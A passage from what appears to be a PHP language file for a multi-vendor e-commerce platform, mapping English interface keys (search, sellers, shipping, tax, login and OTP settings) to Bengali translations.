'রিপোর্ট', 'Reports_&_Analysis' => 'প্রতিবেদন এন্ড বিশ্লেষণ', 'Reports_&_Analytics' => 'প্রতিবেদন এন্ড বিশ্লেষণ', 'Request' => 'অনুরোধ', 'Resend_OTP' => 'ওটিপি পুনরায় প্রেরণ করুন', 'Resend_code_within' => 'মধ্যে কোড পুনরায় পাঠানো', 'Reset' => 'রিসেট', 'Reset Your password' => 'আপনার পাসওয়ার্ড পুনরায় সেট করুন', 'Return Policy' => 'রিটার্ন পলিসি', 'Return_Policy' => 'রিটার্ন পলিসিমালা', 'Returned' => 'ফিরে', 'Review' => 'রিভিউ', 'Review List' => 'রিভিউ তালিকা', 'Review_list' => 'রিভিউ তালিকা', 'Reviewer' => 'পর্যালোচক', 'Reviews' => 'রিভিউ', 'Right' => 'ঠিক আছে', 'Road' => 'রাস্তা', 'Role' => 'ভূমিকা', 'Role Update' => 'ভূমিকা আপডেট', 'Role_Update' => 'ভূমিকা আপডেট', 'Role_deleted_successfully' => 'ভূমিকা সফলভাবে মুছে ফেলা হয়েছে', 'Router' => 'রাউটার', 'Royal Crown' => 'রাজকীয় মুকুট', 'Running Shoes' => 'চলমান জুতা', 'SKU' => 'স্কু', 'SL' => 'এসএল', 'SL#' => 'এসএল#', 'SMS Module Setup' => 'এসএমএস মডিউল সেটআপ', 'SMS_Config' => 'এসএমএস কনফিগারেশন', 'SMS_Gateway_Title' => 'এসএমএস গেটওয়ে শিরোনাম', 'SMS_Module_Setup' => 'এসএমএস মডিউল সেটআপ', 'SMS_gateway_title' => 'এসএমএস গেটওয়ে শিরোনাম', 'SSD' => 'এসএসডি', 'SSLCOMMERZ' => 'Sslcommerz', 'SUPPORT TICKET ANSWER' => 'সাপোর্ট টিকিট উত্তর', 'Safe Payment' => 'নিরাপদ অর্থ পেমেন্ট', 'Sales Commission' => 'বিক্রয় কমিশন', 'Sales_&_Transaction_Report' => 'বিক্রয় ও ট্রান্সেকশন প্রতিবেদন', 'Sales_Statistics' => 'বিক্রয় পরিসংখ্যান', 'Same_as_Delivery_Address' => 'ডেলিভারি ঠিকানা একাউন্টে একই', 'Save' => 'সেভ', 'Save Changes' => 'পরিবর্তনগুলোর সেভ', 'Save changes' => 'পরিবর্তনগুলোর সেভ', 'Save_This_Address' => 'এই ঠিকানা সেভ করুন', 'Save_this_Address' => 'এই ঠিকানা সেভ করুন', 'Saved Addresses' => 'সেভ ঠিকানা', 'Saved_Addresses' => 'সেভ ঠিকানা', 'Search' => 'সার্চ', 'Search Currency Name or Currency Code' => 'মুদ্রার নাম বা মুদ্রা কোড সার্চ করুন', 'Search Data' => 'ডেটা সার্চ করুন', 'Search Product' => 'পণ্য সার্চ', 'Search Product Name' => 'পণ্যের নাম সার্চ করুন', 'Search Products' => 'সার্চ পণ্য', 'Search Ticket by Subject or status...' => 'বিষয় বা স্ট্যাটাস দ্বারা টিকিট সার্চ ...', 'Search by ID...' => 'আইডি দ্বারা সার্চ করুন ...', 'Search by Name' => 'নাম দ্বারা সার্চ', 'Search by Name or Email or Phone' => 'নাম বা ইমেল বা ফোন দ্বারা সার্চ করুন', 'Search by Name or Phone or Email' => 'নাম বা ফোন বা ইমেল দ্বারা সার্চ করুন', 'Search by Order ID' => 'অর্ডার আইডি দ্বারা সার্চ করুন', 'Search by Product Name' => 'পণ্যের নাম অনুসারে সার্চ করুন', 'Search by Product or Customer' => 'পণ্য বা গ্রাহক দ্বারা সার্চ করুন', 'Search by Sub Sub Category' => 'সাব সাব ক্যাটাগরি দ্বারা সার্চ করুন', 'Search by Subject' => 'বিষয় দ্বারা সার্চ', 'Search by Title' => 'শিরোনাম দ্বারা সার্চ', 'Search by Title or Code or Discount Type' => 'শিরোনাম বা কোড বা ছাড়ের ধরণ দ্বারা সার্চ করুন', 'Search by orders id' => 'অর্ডার আইডি দ্বারা সার্চ করুন', 'Search by orders id _or_refund_id' => 'অর্ডার আইডি বা রিফান্ড আইডি দ্বারা সার্চ করুন', 'Search by orders id or order_details_id' => 'অর্ডার আইডি বা অর্ডার ডিটেলস আইডি দ্বারা সার্চ করুন', 'Search by orders id or transaction id' => 'অর্ডার আইডি বা ট্রান্সেকশন আইডি দ্বারা সার্চ করুন', 'Search by product name or bar code' => 'পণ্যের নাম বা বার কোড দ্বারা সার্চ করুন', 'Search by stores' => 'স্টোর দ্বারা সার্চ', 'Search here ...' => 'এখানে সার্চ করুন ...', 'Search orders' => 'সার্চ অর্ডার', 'Search products from this store' => 'এই দোকান থেকে পণ্য সার্চ করুন', 'Search...' => 'সার্চ ...', 'Search_Data' => 'ডেটা সার্চ করুন', 'Search_Method_Name' => 'পদ্ধতির নাম সার্চ করুন', 'Search_Product' => 'পণ্য সার্চ', 'Search_Products' => 'সার্চ পণ্য', 'Search_Store' => 'সার্চ স্টোর', 'Search_by_Attribute_Name' => 'এট্রিবিউট নাম দ্বারা সার্চ করুন', 'Search_by_Banner_Type' => 'ব্যানার প্রকার দ্বারা সার্চ করুন', 'Search_by_Name' => 'নাম দ্বারা সার্চ', 'Search_by_Name_or_Category' => 'নাম বা ক্যাটাগরি দ্বারা সার্চ করুন', 'Search_by_Name_or_Mobile_No_or_Email' => 'নাম বা মোবাইল নং বা ইমেল দ্বারা সার্চ করুন', 'Search_by_Order_ID_or_Transaction_ID' => 'অর্ডার আইডি বা ট্রান্সেকশন আইডি দ্বারা সার্চ করুন', 'Search_by_Sub_Category' => 'সাব ক্যাটাগরি দ্বারা সার্চ করুন', 'Search_by_Sub_Sub_Category' => 'সাব সাব ক্যাটাগরি দ্বারা সার্চ করুন', 'Search_by_email' => 'ইমেলের মাধ্যমে সার্চ করুন', 'Search_by_order_id' => 'অর্ডার আইডি দ্বারা সার্চ করুন', 'Search_by_order_id_or_order_details_id' => 'অর্ডার আইডি বা অর্ডার ডিটেলস আইডি দ্বারা সার্চ করুন', 'Search_by_order_id_or_refund_id' => 'অর্ডার আইডি বা রিফান্ড আইডি দ্বারা সার্চ করুন', 'Search_customers...' => 'গ্রাহকরা সার্চ করুন ...', 'Search_for_items' => 'আইটেমগুলির জন্য সার্চ করুন', 'Search_for_items_or_store' => 'আইটেম বা স্টোর সার্চ করুন', 'Second step' => 'দ্বিতীয় ধাপ', 'Secondary' => 'মাধ্যমিক', 'Secondary Color' => 'গৌণ রঙ', 'Secondary_Banner_updated_Successfully' => 'মাধ্যমিক ব্যানার সফলভাবে আপডেট হয়েছে', 'Secret' => 'গোপন', 'Secret Covered in Sand Comic book pdf' => 'সিক্রেট বালি কমিক বই পিডিএফ', 'Secret Key' => 'সিক্রেট কী', 'See the latest deals and exciting new offers' => 'সর্বশেষতম ডিল এন্ড উত্তেজনাপূর্ণ নতুন অফারগুলি দেখুন', 'See_All' => 'সবগুলো দেখান', 'See_Credential_Setup_Instructions' => 'ক্রেডেনটিয়াল সেটআপ নির্দেশাবলী দেখুন', 'See_Less' => 'কম দেখুন', 'See_More' => 'আরো দেখুন', 'See_all' => 'সবগুলো দেখ', 'Seen' => 'দেখেছি', 'Select' => 'নির্বাচন করুন', 'Select All' => 'সমস্ত নির্বাচন করুন', 'Select Country code' => 'দেশ কোড নির্বাচন করুন', 'Select Coupon Type' => 'কুপন প্রকার নির্বাচন করুন', 'Select Customer' => 'গ্রাহক নির্বাচন করুন', 'Select Logout below if you are ready to end your current session' => 'আপনি যদি আপনার বর্তমান সেশনটি শেষ করতে প্রস্তুত হন তবে নীচে লগআউট নির্বাচন করুন', 'Select Product' => 'পণ্য নির্বাচন করুন', 'Select Seller' => 'বিক্রেতা নির্বাচন করুন', 'Select Time Period' => 'সময়কাল নির্বাচন করুন', 'Select an app type' => 'একটি অ্যাপ্লিকেশন প্রকার নির্বাচন করুন', 'Select an app type and press' => 'একটি অ্যাপ্লিকেশন প্রকার নির্বাচন করুন এন্ড প্রেস', 'Select product' => 'পণ্য নির্বাচন করুন', 'Select reCAPTCHA v2 as' => 'Recaptcha v2 একাউন্টে নির্বাচন করুন', 'Select the' => 'নির্বাচন করুন', 'Select your desire category' => 'আপনার ইচ্ছা অনুযায়ী ক্যাটাগরি নির্বাচন করুন', 'Select_All' => 'সমস্ত নির্বাচন করুন', 'Select_Category' => 'ক্যাটাগরি নির্বাচন করুন', 'Select_City' => 'শহর নির্বাচন করুন', 'Select_Country' => 'দেশ নির্বাচন করুন', 'Select_From_Saved' => 'সেভ থেকে নির্বাচন করুন', 'Select_Logout_below_if_you_are_ready_to_end_your_current_session' => 'আপনি যদি আপনার বর্তমান সেশনটি শেষ করতে প্রস্তুত হন তবে নীচে লগআউট নির্বাচন করুন', 'Select_Payment_Method' => 'পেমেন্ট পদ্ধতি নির্বাচন করুন', 'Select_Withdraw_Method' => 'উইথড্র পদ্ধতি নির্বাচন করুন', 'Select_coupon_bearer' => 'কুপন বহনকারী নির্বাচন করুন', 'Select_coupon_type' => 'কুপন প্রকার নির্বাচন করুন', 'Select_customer' => 'গ্রাহক নির্বাচন করুন', 'Select_main_category' => 'প্রধান ক্যাটাগরি নির্বাচন করুন', 'Select_reCAPTCHA_v2_as_ReCAPTCHA_Type' => 'Recaptcha v2 নির্বাচন করুন recaptcha প্রকার একাউন্টে', 'Seller' => 'বিক্রেতা', 'Seller Apply' => 'বিক্রেতা আবেদন', 'Seller Info' => 'বিক্রেতার তথ্য', 'Seller Information' => 'বিক্রেতার তথ্য', 'Seller List' => 'বিক্রেতার তালিকা', 'Seller Orders' => 'বিক্রেতা অর্ডার', 'Seller POS' => 'বিক্রেতা POS্ট', 'Seller POS permission on/off' => 'বিক্রেতা পোজ অনুমতি চালু/বন্ধ', 'Seller Products' => 'বিক্রেতা পণ্য', 'Seller Registration' => 'বিক্রেতার নিবন্ধকরণ', 'Seller Registration on/off' => 'বিক্রেতা নিবন্ধন চালু/বন্ধ', 'Seller Reports' => 'বিক্রেতা রিপোর্ট', 'Seller Wallet Status' => 'বিক্রেতা ওয়ালেট স্ট্যাটাস', 'Seller product sale Report' => 'বিক্রেতা পণ্য বিক্রয় রিপোর্ট', 'Seller product sale report' => 'বিক্রেতা পণ্য বিক্রয় প্রতিবেদন', 'Seller_Apply' => 'বিক্রেতা আবেদন', 'Seller_Details' => 'বিক্রেতার ডিটেলস', 'Seller_Discount' => 'বিক্রেতা ছাড়', 'Seller_Earning' => 'বিক্রেতা উপার্জন', 'Seller_Image' => 'বিক্রেতার চিত্র', 'Seller_Info' => 'বিক্রেতার তথ্য', 'Seller_Information' => 'বিক্রেতার তথ্য', 'Seller_List' => 'বিক্রেতার তালিকা', 'Seller_Login' => 'বিক্রেতা লগইন', 'Seller_Net_Income' => 'বিক্রেতা নেট আয়', 'Seller_Order' => 'বিক্রেতার অর্ডার', 'Seller_POS_permission_on_or_off' => 'বিক্রেতা POS অনুমতি চালু বা বন্ধ', 'Seller_Product_List' => 'বিক্রেতা পণ্য তালিকা', 'Seller_Reg' => 'বিক্রেতা রেজি', 'Seller_Registration' => 'বিক্রেতার নিবন্ধকরণ', 'Seller_Wallet' => 'বিক্রেতা ওয়ালেট', 'Seller_Wallet_Status' => 'বিক্রেতা ওয়ালেট স্ট্যাটাস', 'Seller_details' => 'বিক্রেতার ডিটেলস', 'Seller_info' => 'বিক্রেতার তথ্য', 'Seller_registration' => 'বিক্রেতার নিবন্ধকরণ', 'Seller_request_for_open_a_shop.' => 'একটি দোকান খোলার জন্য বিক্রেতার অনুরোধ।', 'Sellers' => 'সমস্ত বিক্রেতা', 'Send' => 'প্রেরণ', 'Send a message' => 'একটি মেসেজ পাঠান', 'Send_Mail' => 'মেইল পাঠাও', 'Send_Notification' => 'নোটিফিকেশন প্রেরণ', 'Send_Reply' => 'উত্তর পাঠান', 'Send_your_wallet_money_while_order' => 'অর্ডার দেওয়ার সময় আপনার ওয়ালেট টাকা প্রেরণ করুন', 'Sensitive_data! Make_sure_before_changing.' => 'সংবেদনশীল তথ্য! পরিবর্তন করার আগে নিশ্চিত করুন।', 'Server Key' => 'সার্ভার কী', 'Set Up' => 'সেট আপ', 'Set_Delivery_Address' => 'ডেলিভারি ঠিকানা সেট করুন', 'Set_Form_Map' => 'ফর্ম মানচিত্র সেট করুন', 'Set_Priority' => 'অগ্রাধিকার নির্ধারন কর', 'Set_from_map' => 'মানচিত্র থেকে সেট করুন', 'Setting' => 'বিন্যাস', 'Settings' => 'সেটিংস', 'Settings updated!' => 'সেটিংস আপডেট!', 'Settings_updated' => 'সেটিংস আপডেট', 'Setup' => 'সেটআপ', 'Share' => 'শেয়ার', 'Shipping' => 'শিপিং', 'Shipping Address Choose' => 'শিপিং ঠিকানা পছন্দ করুন', 'Shipping Charge' => 'বহন খরচ', 'Shipping Method' => 'পরিবহণ মাধ্যম', 'Shipping Method Update' => 'শিপিং পদ্ধতি আপডেট', 'Shipping Method deleted successfully' => 'শিপিং পদ্ধতি সফলভাবে মুছে ফেলা হয়েছে', 'Shipping_Address' => 'প্রেরণের ঠিকানা', 'Shipping_And_Billing_Details' => 'শিপিং এন্ড বিলিংয়ের ডিটেলস', 'Shipping_Charge' => 'বহন খরচ', 'Shipping_Details' => 'শিপিং ডিটেলস', 'Shipping_Fee' => 'শিপিং ফি', 'Shipping_Method' => 'পরিবহণ মাধ্যম', 'Shipping_Method_Select' => 'শিপিং পদ্ধতি নির্বাচন করুন', 'Shipping_and_billing' => 'শিপিং এন্ড বিলিং', 'Shoes' => 'জুতা', 'Shop' => 'দোকান', 'Shop Edit' => 'শপ এডিট', 'Shop Name' => 'শপ নাম', 'Shop Page' => 'দোকান পৃষ্ঠা', 'Shop info সফলভাবে আপডেট করা হয়েছে৷!' => 'শপ তথ্য সফলভাবে আপডেট হয়েছে!', 'Shop name' => 'শপ নাম', 'Shop view' => 'শপ ভিউ', 'Shop_Again_From_Your_Recent_Store' => 'আপনার সাম্প্রতিক স্টোর থেকে আবার কেনাকাটা করুন', 'Shop_Info' => 'শপ তথ্য', 'Shop_Information' => 'কেনাকাটা তথ্য', 'Shop_Name' => 'শপ নাম', 'Shop_Now' => 'এখনই কিনুন', 'Shop_Page' => 'দোকান পৃষ্ঠা', 'Shop_cover_Image' => 'শপ কভার ইমেজ', 'Shop_wise_with' => 'সাথে কেনা', 'Shopping_And_Billing_Details' => 'কেনাকাটা এন্ড বিলিংয়ের ডিটেলস', 'Shopping_Details' => 'শপিংয়ের ডিটেলস', 'Short title' => 'ছোট শিরোনাম', 'Show' => 'শো', 'Show data by date range' => 'তারিখের পরিসীমা অনুসারে ডেটা দেখান', 'Show_Billing_Address_In_Checkout' => 'চেকআউটে বিলিং ঠিকানা দেখান', 'Show_Filter_Options' => 'ফিল্টার বিকল্পগুলি দেখান', 'Show_Order' => 'অর্ডার দেখান', 'Show_Order :' => 'অর্ডার অর্ডার:', 'Show_Order_:' => 'অর্ডার অর্ডার:', 'Show_Product' => 'পণ্য দেখান', 'Show_as_featured' => 'ফীচার একাউন্টে প্রদর্শন করুন', 'Showing' => 'Showing', 'Sidebar Banner' => 'সাইডবার ব্যানার', 'Sign out' => 'সাইন আউট', 'Sign_In' => 'সাইন ইন করুন', 'Sign_Out' => 'সাইন আউট', 'Sign_Up' => 'নিবন্ধন করুন', 'Sign_in_First_to_Apply_Coupon' => 'কুপন প্রয়োগ করতে প্রথমে সাইন ইন করুন', 'Silicone Strap Analogue Sports Watch Rectangular Dial New Model 2023 Men Watches' => 'সিলিকন স্ট্র্যাপ অ্যানালগ স্পোর্টস ওয়াচ আয়তক্ষেত্রাকার ডায়াল নতুন মডেল 2023 পুরুষ ঘড়ি', 'Similar_Category_Product' => 'অনুরূপ ক্যাটাগরি পণ্য', 'Similar_Product_from_This_Store' => 'এই স্টোর থেকে অনুরূপ পণ্য', 'Single_vendor' => 'একক বিক্রেতা', 'Site Key' => 'সাইট কী', 'Site URL' => 'সাইট URL টি', 'Size' => 'আকার', 'Smart Watch' => 'স্মার্ট ওয়াচ', 'Smartphone' => 'স্মার্টফোন', 'Sneakers man new design fabrics shoes with high lace up design and rubber materi' => 'স্নিকার্স ম্যান নতুন ডিজাইনের কাপড়ের জুতা উচ্চ লেইস আপ ডিজাইন এন্ড রাবার ম্যাটারি সহ', 'Social Link Is Requeired' => 'সোশ্যাল লিঙ্ক প্রয়োজন', 'Social Login' => 'সোশ্যাল লগইন', 'Social Media' => 'সোশ্যাল মাধ্যম', 'Social Media Already taken' => 'সোশ্যাল মিডিয়া ইতিমধ্যে নেওয়া হয়েছে', 'Social Media inserted Successfully' => 'সোশ্যাল মিডিয়া সফলভাবে এড হয়েছে', 'Social Name Is Requeired' => 'সোশ্যাল নাম প্রয়োজন', 'Social info সফলভাবে আপডেট করা হয়েছে৷' => 'সোশ্যাল তথ্য সফলভাবে আপডেট হয়েছে', 'Social media deleted Successfully' => 'সোশ্যাল মিডিয়া সফলভাবে মুছে ফেলা হয়েছে', 'Social-Media-Chatting' => 'সোশ্যাল মিডিয়া-চ্যাটিং', 'Social_Media_Chat' => 'সোশ্যাল মিডিয়া চ্যাট', 'Social_Media_Chatting' => 'সোশ্যাল মিডিয়া চ্যাটিং', 'Social_Media_Links' => 'সোশ্যাল মিডিয়া লিঙ্ক', 'Social_Media_Login' => 'সোশ্যাল মিডিয়া লগইন', 'Software version' => 'সফ্টওয়্যার সংস্করণ', 'Sold' => 'বিক্রি', 'Something went wrong!' => 'কিছু ভুল হয়েছে!', 'Soon_Stock_Out' => 'শীঘ্রই স্টক আউট', 'Sorry' => 'দুঃখিত', 'Sorry product is out of stock.' => 'দুঃখিত পণ্য স্টকের বাইরে।', 'Sorry product out of stock' => 'দুঃখিত পণ্য স্টক বাইরে', 'Sorry stock limit exceeded' => 'দুঃখিত স্টক সীমা ছাড়িয়ে গেছে', 'Sorry the minimum order quantity does not match' => 'দুঃখিত সর্বনিম্ন অর্ডার পরিমাণের সাথে মেলে না', 'Sorry the minimum value was reached' => 'দুঃখিত সর্বনিম্ন মান পৌঁছেছে', 'Sorry_Out_of_stock' => 'স্টক বাইরে দুঃখিত', 'Sorry_we_can`t_complete_your_order' => 'দুঃখিত আমরা আপনার অর্ডার শেষ করতে পারি না', 'Sort' => 'সাজান', 'Sort_by' => 'ক্রমানুসার', 'Standard_Delivery' => 'স্ট্যান্ডার্ড ডেলিভারি', 'Start' => 'শুরু', 'Start Date' => 'শুরুর তারিখ', 'Start a conversation' => 'একটি কথোপকথন শুরু করুন', 'Start_Date' => 'শুরুর তারিখ', 'Start_From' => 'থেকে শুরু', 'State' => 'স্টেট', 'Static Stock Limit' => 'স্ট্যাটিক স্টক সীমা', 'Statistics' => 'পরিসংখ্যান', 'Status' => 'স্ট্যাটাস', 'Status Change successfully' => 'সফলভাবে স্ট্যাটাস পরিবর্তন', 'Status Change successfully !' => 'সফলভাবে স্ট্যাটাস পরিবর্তন!', 'Status updated failed. Product must be approved' => 'স্ট্যাটাস আপডেট ব্যর্থ। হয়েছে পণ্য অবশ্যই অনুমোদিত হতে হবে', 'Status সফলভাবে আপডেট করা হয়েছে৷' => 'স্ট্যাটাস সফলভাবে আপডেট হয়েছে', 'Status_updated_failed.' => 'স্ট্যাটাস আপডেট হয়েছে ব্যর্থ।', 'Stock_Available' => 'পরিমান মত মজুত আছে', 'Stock_Not_Available' => 'স্টক এভেইল্যাবলে নেই', 'Stock_Status' => 'স্টক স্ট্যাটাস', 'Stock_not_available' => 'স্টক এভেইল্যাবলে নেই', 'Store' => 'স্টোর', 'Store_Address' => 'স্টোর ঠিকানা', 'Store_Banner' => 'স্টোর ব্যানার', 'Store_Bottom_Banner' => 'নীচে ব্যানার ষ্টোর করুন', 'Store_Client_ID' => 'ক্লায়েন্ট আইডি ষ্টোর করুন', 'Store_Client_Secret_Key' => 'ক্লায়েন্ট সিক্রেট কী স্টোর', 'Store_List' => 'স্টোর তালিকা', 'Store_Logo' => 'লোগো স্টোর', 'Store_Name' => 'দোকানের নাম', 'Store_Secondary_Banner' => 'মাধ্যমিক ব্যানার সেভ করুন', 'Story Book' => 'গল্পের বই', 'String' => 'স্ট্রিং', 'Stripe' => 'stripe', 'Sub' => 'সাব', 'Sub Category' => 'সাব ক্যাটাগরি', 'Sub Category deleted Successfully.' => 'সাব ক্যাটাগরি সফলভাবে মুছে ফেলা হয়েছে।', 'Sub Sub Category' => 'সাব সাব ক্যাটাগরি', 'Sub Sub Category deleted Successfully.' => 'সাব সাব ক্যাটাগরি সফলভাবে মুছে ফেলা হয়েছে।', 'Sub type= I m not a robot Checkbox' => 'সাব টাইপ=> আমি কোনও রোবট চেকবক্স নই', 'Sub_Categories' => 'সাব ক্যাটাগরি', 'Sub_Category' => 'সাব ক্যাটাগরি', 'Sub_Category_deleted_Successfully.' => 'সাব ক্যাটাগরি সফলভাবে মুছে ফেলা হয়েছে।', 'Sub_Sub_Categories' => 'সাব সাব ক্যাটাগরি', 'Sub_Sub_Category_Deleted_Successfully' => 'সাব সাব ক্যাটাগরি সফলভাবে মুছে ফেলা হয়েছে', 'Sub_Title' => 'সাব শিরোনাম', 'Sub_category' => 'সাব ক্যাটাগরি', 'Sub_sub_category' => 'সাব সাব ক্যাটাগরি', 'Sub_total' => 'সাব মোট', 'Subject' => 'বিষয়', 'Submit' => 'জমা দিন', 'Submit Reply' => 'প্রতি উত্তর দিন', 'Submit message' => 'মেসেজ জমা দিন', 'Submit_a_Deliveryman_Review' => 'একটি ডেলিভারিকারী রিভিউ জমা দিন', 'Submit_a_review' => 'একটি রিভিউ জমা দিন', 'Subscribe to out neew channel to get latest updates' => 'সর্বশেষ আপডেট পেতে চ্যানেলে সাবস্ক্রাইব করুন', 'Subtotal' => 'সাবটোটাল', 'Super Store Online' => 'সুপার স্টোর অনলাইন', 'Support' => 'সাপোর্ট', 'Support Ticket' => 'সাপোর্ট টিকিট', 'Support Ticket Answer' => 'সাপোর্ট টিকিট উত্তর', 'Support Tickets' => 'টিকিট সাপোর্ট', 'Support_Section' => 'সাপোর্ট ক্যাটাগরি', 'Support_Ticket' => 'সাপোর্ট টিকিট', 'Support_Ticket_Inbox' => 'সাপোর্ট টিকিট ইনবক্স', 'System Default currency সফলভাবে আপডেট করা হয়েছে৷!' => 'সিস্টেম ডিফল্ট মুদ্রা সফলভাবে আপডেট হয়েছে!', 'System Settings' => 'পদ্ধতি নির্ধারণ', 'System_Settings' => 'পদ্ধতি নির্ধারণ', 'System_Setup' => 'সিস্টেম সেটআপ', 'TAX' => 'কর', 'TAX Exclude Product TAX Exclude Product TAX Exclude Product TAX Exclude Product' => 'ট্যাক্স বাদ দিন পণ্য কর বাদ দিন পণ্য ট্যাক্স বাদ দিন পণ্য কর বাদ দিন পণ্য', 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product' => 'কর অন্তর্ভুক্ত পণ্য ট্যাক্স অন্তর্ভুক্ত পণ্য কর অন্তর্ভুক্ত পণ্য ট্যাক্স অন্তর্ভুক্ত পণ্য অন্তর্ভুক্ত', 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product ' => 'কর অন্তর্ভুক্ত পণ্য ট্যাক্স অন্তর্ভুক্ত পণ্য কর অন্তর্ভুক্ত পণ্য ট্যাক্স অন্তর্ভুক্ত পণ্য অন্তর্ভুক্ত', 'THANK YOU' => 'ধন্যবাদ', 'THANK_YOU' => 'ধন্যবাদ', 'TV & Home Appliance' => 'টিভি ও হোম অ্যাপ্লায়েন্স', 'Table' => 'টেবিল', 'Tax' => 'কর', 'Tax Collected' => 'কর আদায়', 'Tax Given' => 'কর দেওয়া', 'Tax_Collected' => 'কর আদায়', 'Tax_Model' => 'কর মডেল', 'Team ID' => 'টিম আইডি', 'Tech Light' => 'টেক লাইট', 'Tech Shop' => 'টেক শপ', 'Techno Lab' => 'টেকনো ল্যাব', 'Television' => 'টেলিভিশন', 'Tell us' => 'আমাদেরকে বল', 'Temporary OTP block time refers to a security measure implemented by systems to restrict access to OTP service for a specified period of time for wrong OTP submission.' => 'অস্থায়ী ওটিপি ব্লক সময়টি ভুল ওটিপি জমা দেওয়ার জন্য একটি নির্দিষ্ট সময়ের জন্য ওটিপি পরিষেবাতে অ্যাক্সেসকে সীমাবদ্ধ করার জন্য সিস্টেমগুলি দ্বারা প্রয়োগ করা একটি সুরক্ষা ব্যবস্থা বোজায়।', 'Temporary login block time refers to a security measure implemented by systems to restrict access for a specified period of time for wrong Password submission' => 'অস্থায়ী লগইন ব্লক সময়টি ভুল পাসওয়ার্ড জমা দেওয়ার জন্য নির্দিষ্ট সময়ের জন্য অ্যাক্সেসকে সীমাবদ্ধ করার জন্য সিস্টেমগুলি দ্বারা প্রয়োগ করা একটি সুরক্ষা পরিমাপকে বোজায়', 'Temporary_Closed' => 'অস্থায়ী বন্ধ', 'Term_&_Conditions' => 'টার্মস এন্ড কন্ডিশন', 'Terms & Condition' => 'শর্তাবলী', 'Terms & Conditions' => 'শর্তাবলী', 'Terms and Condition' => 'শর্তাবলী', 'Terms_&_Conditions' => 'শর্তাবলী', 'Terms_&_Policy' => 'টার্মস এন্ড পলিসি', 'Terms_and_Conditions' => 'শর্তাবলী', 'Test Product' => 'চেক পণ্য', 'Test_Email_Sender' => 'চেক ইমেল প্রেরক', 'Text' => 'টেক্সট', 'Thank you for joinning with' => 'আমাদের সঙ্গে যোগদানের জন্য আপনাকে ধন্যবাদ', 'Thank_you_for_your_verification' => 'আপনার যাচাইয়ের জন্য আপনাকে ধন্যবাদ', 'Thanks for your order' => 'আপনার অর্ডারের জন্য ধন্যবাদ', 'The Wall' => 'প্রাচীর', 'The billing period for your paid subscription to Google Workspace begins tomorrow.' => 'Google Workspace-এ আপনার পেড সাবস্ক্রিপশনের বিলিংয়ের সময়কাল আগামীকাল থেকে শুরু হবে', 'The maximum OTP hit is a measure of how many times a specific one-time password has been generated and used within a time.' => 'সর্বাধিক ওটিপি হিট হল নির্দিষ্ট এক সময়ের পাসওয়ার্ড কতবার জেনারেট হয়েছে এন্ড এক সময়ের মধ্যে ব্যবহার করা হয়েছে তার একটি পরিমাপ।', 'The maximum login hit is a measure of how many times a user can submit password within a time.' => 'সর্বাধিক লগইন হিট হল কোনও ব্যবহারকারী এক সময়ের মধ্যে কতবার পাসওয়ার্ড জমা দিতে পারে তার একটি পরিমাপ।', 'The_file_upload_field_is_required' => 'ফাইল আপলোড ক্ষেত্র প্রয়োজন', 'The_product_report_will_show_based_on_the_product_added_date' => 'পণ্য প্রতিবেদনটি পণ্য যুক্ত তারিখের ভিত্তিতে প্রদর্শিত হবে', 'Theme Changed to Theme Aster' => 'থিম থিম এস্টারে পরিবর্তিত হয়েছে', 'Theme Changed to Theme Fashion' => 'থিম থিম ফ্যাশনে পরিবর্তিত হয়েছে', 'Think before you proceed' => 'আপনি এগিয়ে যাওয়ার আগে চিন্তা করুন', 'Third step' => 'তৃতীয় পদক্ষেপ', 'This' => 'এই', 'This Currency cannot be removed due to payment gateway dependency!' => 'পেমেন্ট গেটওয়ে নির্ভরতার কারণে এই মুদ্রা অপসারণ করা যাবে না!', 'This Month' => 'এই মাস', 'This Month s Statistics' => 'এই মাসের পরিসংখ্যান', 'This Months Statistics' => 'এই মাসের পরিসংখ্যান', 'This Week' => 'এই সপ্তাহ', 'This Year' => 'এই বছর', 'This Year Earning' => 'এই বছর উপার্জন', 'This is not an image file' => 'এটি কোনও চিত্র ফাইল নয়', 'This page is for A4 size page printer so it won t be visible in smaller devices' => 'এই পৃষ্ঠাটি এ 4 আকারের পৃষ্ঠা প্রিন্টারের জন্য তাই এটি ছোট ডিভাইসে দৃশ্যমান হতে পারে না', 'This_Month' => 'এই মাস', 'This_Week' => 'এই সপ্তাহ', 'This_Year' => 'এই বছর', 'This_field_required' => 'এই ক্ষেত্র প্রয়োজন', 'This_page_contains_sensitive_information.Make_sure_before_changing.' => 'এই পৃষ্ঠায় সংবেদনশীল তথ্য রয়েছে। পরিবর্তন করার আগে নিশ্চিত করুন।', 'This_page_is_having_sensitive_data.Make_sure_before_changing.' => 'এই পৃষ্ঠায় সংবেদনশীল ডেটা রয়েছে। পরিবর্তন করার আগে নিশ্চিত করুন।', 'This_shop_is_in_temporary_closed' => 'এই দোকানটি অস্থায়ী বন্ধ রয়েছে', 'This_shop_is_in_vacation_mode' => 'এই দোকানটি ছুটি মোডে রয়েছে', 'Title' => 'শিরোনাম', 'To' => 'প্রতি', 'To get site key and secret keyGo to the Credentials page' => 'ক্রেডেনটিয়াল পৃষ্ঠায় সাইট কী এন্ড সিক্রেট কীগো পেতে', 'To_visit_your_currently_active_sms_gateway_settings_please_follow_the_link.' => 'আপনার বর্তমানে সক্রিয় এসএমএস গেটওয়ে সেটিংস দেখতে দয়া করে লিঙ্কটি অনুসরণ করুন।', 'Today s Statistics' => 'আজকের পরিসংখ্যান', 'Todays Statistics' => 'আজকের পরিসংখ্যান', 'Todays_Best_Deal' => 'আজকের সেরা ডিল', 'Today’s_Best_Deal' => 'আজকের সেরা ডিল', 'Token' => 'টোকেন', 'Top' => 'শীর্ষ', 'Top Freezer Refrigerator' => 'শীর্ষ ফ্রিজার রেফ্রিজারেটর', 'Top Side Banner' => 'শীর্ষ পাশের ব্যানার', 'Top Stores' => 'শীর্ষ স্টোর', 'Top_5_Product_Wise_Sale' => 'শীর্ষ 5 পণ্য বিক্রয়', 'Top_Delivery_Man' => 'শীর্ষ ডেলিভারি ম্যান', 'Top_Fashion_House' => 'শীর্ষ ফ্যাশন হাউস', 'Top_Rated' => 'শীর্ষ রেট', 'Top_Rated_Product_from_This_Store' => 'এই দোকান থেকে শীর্ষ রেটেড পণ্য', 'Top_Rated_Products' => 'শীর্ষ রেটেড পণ্য', 'Top_Rated_Seller' => 'শীর্ষ রেটেড বিক্রেতা', 'Top_Stores' => 'শীর্ষ স্টোর', 'Top_selling_products' => 'শীর্ষ বিক্রয় পণ্য', 'Topic' => 